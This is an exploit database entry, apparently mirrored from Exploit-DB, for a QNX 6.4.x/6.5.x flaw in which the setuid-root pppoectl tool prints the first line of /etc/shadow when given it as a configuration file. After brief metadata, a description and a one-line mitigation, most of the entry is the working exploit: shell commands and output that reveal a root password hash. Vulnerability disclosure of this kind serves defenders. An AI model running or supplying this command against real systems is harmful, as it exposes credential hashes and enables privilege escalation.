QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013

vendor:

QNX 6.5.0

by:

cenobyte

7,2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: QNX 6.5.0

Affected Version From: QNX 6.4.1

Affected Version To: QNX 6.5.0SP1

Patch Exists: NO

Related CWE: N/A

CPE: o:qnx:qnx_6.5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: QNX 6.5.0SP1, QNX 6.5.0, QNX 6.4.1

2013

QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013

QNX setuid root /sbin/pppoectl allows any user to gain access to privileged information such as the root password hash. The vulnerability exists because of a failure to drop privileges or check the permissions and ownership on the file specified as the configuration file. If a user specifies a file such as /etc/shadow, pppoectl will display the first line of the shadow file in the error output.

Mitigation:

Ensure that the permissions and ownership of the configuration file are properly set and that privileges are dropped when necessary.

Source

Exploit-DB raw data:

#
#          QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
#                         <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
# information such as the root password hash.
#
# The vulnerability exists because of a failure to drop privileges or check the
# permissions and ownership on the file specified as the configuration file.
#
# If a user specifies a file such as /etc/shadow, pppoectl will display the
# first line of the shadow file in the error output.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1

$ id
uid=100(user) gid=100

$ ls -la /etc/shadow
-rw-------  1 root      root             69 Oct 10 16:55 /etc/shadow
$ pppoectl -f /etc/shadow lo0
pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"